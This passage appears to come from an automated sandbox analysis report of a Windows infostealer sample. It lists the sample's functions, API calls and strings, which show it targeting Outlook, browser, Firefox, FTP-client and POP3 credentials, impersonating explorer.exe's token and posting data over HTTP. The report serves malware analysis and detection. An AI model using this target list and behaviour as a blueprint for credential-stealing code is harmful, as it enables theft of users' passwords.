                    • Part of subcall function 00409ED6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F12
                    • Part of subcall function 00409ED6: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F1B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F170
                  • lstrcmpiA.KERNEL32(?,identification), ref: 0040F1F0
                  • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F205
                  • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F228
                  • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F247
                  • lstrcmpiA.KERNEL32(?,identities), ref: 0040F266
                  • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F2C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                  • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                  • API String ID: 636431001-4287852900
                  • Opcode ID: bb333d8fbd1e7255a575d737b61fc163956e0edd29ac13a13b9663bcba2d83ed
                  • Instruction ID: 0e22ab3b2dc57d385f5d98c67c41156d2e2fceceff404690329680ab2f3ee2d4
                  • Opcode Fuzzy Hash: bb333d8fbd1e7255a575d737b61fc163956e0edd29ac13a13b9663bcba2d83ed
                  • Instruction Fuzzy Hash: 47413D3584021DEAEF219F91CD41FDA7B79BB09304F0041EAB608B5092DB799AD9DF94
                  Function 00402C04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402B50
                  • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402B74
                  • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402B9E
                  • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402BB6
                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402BC3
                  • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402BE4
                  • CloseHandle.KERNEL32(?), ref: 00402C09
                  • CloseHandle.KERNEL32(?,?), ref: 00402C11
                  • CloseHandle.KERNEL32(?), ref: 00402C1B
                  • Process32Next.KERNEL32(?,00000128), ref: 00402C2D
                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402C3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                  • String ID: explorer.exe
                  • API String ID: 3144406365-3187896405
                  • Opcode ID: 3322303f64adb676d8db25f6ed76fe5f098889783615bc13d16c4bcdfa4f3e92
                  • Instruction ID: 5723e61b88d4e9f9222964c16d2d2afb6602735196ba38223fd4c3419d9b93c0
                  • Opcode Fuzzy Hash: 3322303f64adb676d8db25f6ed76fe5f098889783615bc13d16c4bcdfa4f3e92
                  • Instruction Fuzzy Hash: 27214230A14118ABEF229B51DE49BEEBBB4BB14344F1044B7E204F11E0DBB89E84DF59
                  Function 0040B61E Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004026D3: lstrlen.KERNEL32(?), ref: 00402707
                  • StrStrIA.SHLWAPI(?,004133CD), ref: 0040B632
                  • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B654
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpilstrlen
                  • String ID: CONSTRAINT$origin_url$password_value$username_value
                  • API String ID: 3649823140-2401479949
                  • Opcode ID: 83092cc97906ed6b200ae337b8dc46f63c20743d4bbdfc852c011f4a0e956700
                  • Instruction ID: 9c5d8a244427796840b79d864bce391278a18baf4e7973b846767f3050b87988
                  • Opcode Fuzzy Hash: 83092cc97906ed6b200ae337b8dc46f63c20743d4bbdfc852c011f4a0e956700
                  • Instruction Fuzzy Hash: D3110035610009A6CF112F25EC01DDE3F61AB65398B008537F845A82A1E7BE89E5978D
                  Function 00403A02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403A75
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403AA0
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403AE6
                  • wsprintfA.USER32 ref: 00403B0B
                    • Part of subcall function 004039D4: 72A313D0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004039F9
                  • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403B36
                  • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403B81
                  Strings
                  • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B03
                  • <, xrefs: 00403AC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Crack$A313AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 118042637-2005047030
                  • Opcode ID: 87abe820bb0d6036ffe2e3babf49ec09694a1781688e39f6c4ff6adf4ca460de
                  • Instruction ID: 1de9cb80474df7d9d3716ce442e77a1af239618b76ab67b58deaa212d5e7e0f6
                  • Opcode Fuzzy Hash: 87abe820bb0d6036ffe2e3babf49ec09694a1781688e39f6c4ff6adf4ca460de
                  • Instruction Fuzzy Hash: 3641A671D00209EADF11AFE1DC41BEEBFB9AF04349F10403AF510B51A2DBB96A55DB19
                  Function 004096A3 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: IsRelative$Path$Profile$profiles.ini
                  • API String ID: 0-4107377610
                  • Opcode ID: 737542b6f8ea86c960c44e09380ca456abda41aea68274e537a4f94da42fe37e
                  • Instruction ID: 95d3b633096284f4bbd09f7529df532e569788953b1a2b841014d990d7b74c68
                  • Opcode Fuzzy Hash: 737542b6f8ea86c960c44e09380ca456abda41aea68274e537a4f94da42fe37e
                  • Instruction Fuzzy Hash: 7441383591014AFADF122FA19C42EAE7F72AF40344F14457BB510B51F2D7BA4DA1AB08
                  Function 0040384D Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • StrStrIA.SHLWAPI(?,Content-Length:), ref: 004038D5
                  • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 004038E6
                  • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403907
                  • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040391E
                  • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040392F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$AllocLocal
                  • String ID: Content-Length:$Location:
                  • API String ID: 2140729754-2400408565
                  • Opcode ID: 34bf45d2ae5e5f4909a357a932ac428661d7f98a5949df93852985c7b08e6a42
                  • Instruction ID: 83ca887fabee062547b53eafaae993b34422474f705763326791051a1ec7c268
                  • Opcode Fuzzy Hash: 34bf45d2ae5e5f4909a357a932ac428661d7f98a5949df93852985c7b08e6a42
                  • Instruction Fuzzy Hash: 2141C375A04209BBDB10AFA5CC41B9EFF79EF41304F208177F610B62E1DBB98A519B58
                  Function 00404087 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404095
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004040AD
                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004040BE
                  • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004040CD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CurrentHandleModuleProcess
                  • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                  • API String ID: 977827838-3073145729
                  • Opcode ID: 4fcdc282f5bffe635abf6e5282685a6b48bb5cded201efcccefc7716ffc6b61f
                  • Instruction ID: 0c0e3d299907b3ee1aff85cb762b2a3139cf97807ba38a296252d8d46407c7e6
                  • Opcode Fuzzy Hash: 4fcdc282f5bffe635abf6e5282685a6b48bb5cded201efcccefc7716ffc6b61f
                  • Instruction Fuzzy Hash: 2DF05B7570020472C72066F66C46BDB2A9C8784399F140837B301F21C1E9FDCEC18268
                  Function 0040D436 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <setting name="$value="
                  • API String ID: 0-3468128162
                  • Opcode ID: d66ce80f9a1f7a768bb22e3579432f9b56c9652e4afbe16f7a293e4c445b665b
                  • Instruction ID: c33e9c415a64bff515884bf69f9fec0b61441930a1e01253635b8b034e8d7c01
                  • Opcode Fuzzy Hash: d66ce80f9a1f7a768bb22e3579432f9b56c9652e4afbe16f7a293e4c445b665b
                  • Instruction Fuzzy Hash: 9E319231D04159AACB11AFE58C42AFEBFF59F19318F144077F800B3291E27D5E849BAA
                  Function 00401DD2 Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401DF3
                  • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E00
                  • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E14
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E29
                  • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E38
                  • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E3F
                  • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                  • String ID:
                  • API String ID: 3150701006-0
                  • Opcode ID: 949d4fb8c32c1c300465c7b7006e2c22f1bc7f796e9aa28519f762924f610864
                  • Instruction ID: 85007cd7ea39287834dcbb019f2643e60f627f5ec5cda8a57e9b5bd1c9afc158
                  • Opcode Fuzzy Hash: 949d4fb8c32c1c300465c7b7006e2c22f1bc7f796e9aa28519f762924f610864
                  • Instruction Fuzzy Hash: 17115270280311B6EB312F31CC83F493A989B02B58F208577B710BE1E6D6F9A840969C
                  Function 004082BA Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ftp://$http://$https://
                  • API String ID: 0-2804853444
                  • Opcode ID: 824bf21748527ccf0ee5e405d558aa0ac1a34ce766c71e19e7ed342020c2d771
                  • Instruction ID: f252357bb19d0abd475bfb71269b74c2bf29c34e724c4a7a1edd31d425671f1d
                  • Opcode Fuzzy Hash: 824bf21748527ccf0ee5e405d558aa0ac1a34ce766c71e19e7ed342020c2d771
                  • Instruction Fuzzy Hash: DB61F531800109FEDF11AF91CD41AEEBBB9EF50348F00807AB945B51A1DB7A8B95DB98
                  Function 0040DCE0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "/>$winex="
                  • API String ID: 0-1498080979
                  • Opcode ID: 3eb132c7603cfba6daa0d9d8a7b522bd3bd9872680de231d3961a307f8acaa4d
                  • Instruction ID: 9434819f4bc3329f6bcbf48870171796baa6cf8dabf0d126b8c2ebfbf643848a
                  • Opcode Fuzzy Hash: 3eb132c7603cfba6daa0d9d8a7b522bd3bd9872680de231d3961a307f8acaa4d
                  • Instruction Fuzzy Hash: 94313B31D04109BACF12ABE1CC029EE7E76AF54348F104037F501B61B2D77E8A55EBA9
                  Function 00407D4F Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,FTPCON), ref: 00407D7D
                  • StrStrIA.SHLWAPI(007203F8,FTP CONTROL,00000000,007200D8,FTPCON), ref: 00407D89
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                  • API String ID: 0-2908215140
                  • Opcode ID: 3ee4422c411aad379d804a98dde5ede144b823e812d4c7972b1e98bbef3f28bc
                  • Instruction ID: 3a587dd68ddc132e3d47e9ae6ef5358798d7162d4954e74c56b0eb14a8e86de6
                  • Opcode Fuzzy Hash: 3ee4422c411aad379d804a98dde5ede144b823e812d4c7972b1e98bbef3f28bc
                  • Instruction Fuzzy Hash: 6501D23090410579DB112B318D02FBF3E199F41714F24403BB551B22E3E6BC6A92929E
                  Function 0040F6CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • GetHGlobalFromStream.OLE32(?,?,0040F6E3), ref: 0040F6F3
                  • GlobalLock.KERNEL32(?), ref: 0040F714
                  • GlobalUnlock.KERNEL32(?), ref: 0040F72C
                  • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F6E3), ref: 0040F747
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$FromLockStreamUnlock
                  • String ID: STATUS-IMPORT-OK
                  • API String ID: 2287449323-1591331578
                  • Opcode ID: b6e8bdff3ff7926463861a998b6e19064833c0d612ea786073f2b4296815f8bd
                  • Instruction ID: 60fd6dd111938d6d038ff2f74b19831a1621e6a5a019240cec079445e7f13ed7
                  • Opcode Fuzzy Hash: b6e8bdff3ff7926463861a998b6e19064833c0d612ea786073f2b4296815f8bd
                  • Instruction Fuzzy Hash: 4B016135D04209BBCF112BA2CC829AD7F29AB01348F1041B7B450B65F2DABE9E559B19
                  Function 00402200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  • lstrlen.KERNEL32(?), ref: 00402214
                  • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                  • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                  • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: .exe
                  • API String ID: 2414487701-4119554291
                  • Opcode ID: 7e258b6c382b1638d522e4589bc77b8835f56ee84e5359e788166243c081256f
                  • Instruction ID: 20fea0f44eef862f296ac9e4666e5c2a0ca91eb8a47988185cb6541b9d05db6f
                  • Opcode Fuzzy Hash: 7e258b6c382b1638d522e4589bc77b8835f56ee84e5359e788166243c081256f
                  • Instruction Fuzzy Hash: 92F0AF3160428679DB3272A58C09F6F7E959B83740F2440BBF100AA2D2E7FD984293AD
                  Function 0040E21C Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <POP3_Password2
                  • API String ID: 0-2923094552
                  • Opcode ID: b2ededce397b26cab0af6121c7eeb62d9f65699bf69da15e4c12fc532cd8696e
                  • Instruction ID: 3dcf51a08c645b7b89c7da5a563217d878ff6c10a32c66723cc5229c5e5481ec
                  • Opcode Fuzzy Hash: b2ededce397b26cab0af6121c7eeb62d9f65699bf69da15e4c12fc532cd8696e
                  • Instruction Fuzzy Hash: 32412D31D00009EECF12ABA2CD018EEBEB5AF54354F14447BF901B61B1D77A8E61AB69
                  Function 0040C94D Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON
                  Download Yara Rule
                  APIs
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C97D
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040C9A3
                  • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9C7
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9E9
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9D4
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                  • String ID:
                  • API String ID: 1890766102-0
                  • Opcode ID: f09f4bcb1ad51d1da0f405e5d6498c58e5f48926fb0290af68c89bb95b306185
                  • Instruction ID: a379617581106fd5fb9413f6ad87db1a18af527bc8f1d65a3274682b4803367b
                  • Opcode Fuzzy Hash: f09f4bcb1ad51d1da0f405e5d6498c58e5f48926fb0290af68c89bb95b306185
                  • Instruction Fuzzy Hash: 55218E70A00208FEEF21ABE1CC42F9E7F68AB04744F20406BF100BA1E1D7BD5A409B18
                  Function 004057DD Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007203F8,FTP Navigator), ref: 0040580B
                  • StrStrIA.SHLWAPI(007203F8,FTP Commander,007203F8,FTP Navigator), ref: 00405839
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: FTP Commander$FTP Navigator$ftplist.txt
                  • API String ID: 1884169789-2424314702
                  • Opcode ID: 06f67a4a0e3afc5c5b97338d1b9377692534aeb4b7779063e44e602c447dc653
                  • Instruction ID: a94d4ce6a8862bcab918c2400cf106f54a6507ddef4cf3c824bb74ed6eb97003
                  • Opcode Fuzzy Hash: 06f67a4a0e3afc5c5b97338d1b9377692534aeb4b7779063e44e602c447dc653
                  • Instruction Fuzzy Hash: F3010831900105B9DB1137329C02FAF3E19DB41314F24843BB955B22E2D6FC9FA18AAC
                  Function 0040CBD2 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,FTPNow), ref: 0040CBF9
                  • StrStrIA.SHLWAPI(007200D8,FTP Now,007200D8,FTPNow), ref: 0040CC0A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FTP Now$FTPNow$sites.xml
                  • API String ID: 0-284577462
                  • Opcode ID: 5a2d900ee459afcd9954fdf8e956b5bf74b060edb0ad68932bc476247c62cd99
                  • Instruction ID: b263a6c4b0789433142b9ec9283812031cf69d713907017c093c2b39616db10d
                  • Opcode Fuzzy Hash: 5a2d900ee459afcd9954fdf8e956b5bf74b060edb0ad68932bc476247c62cd99
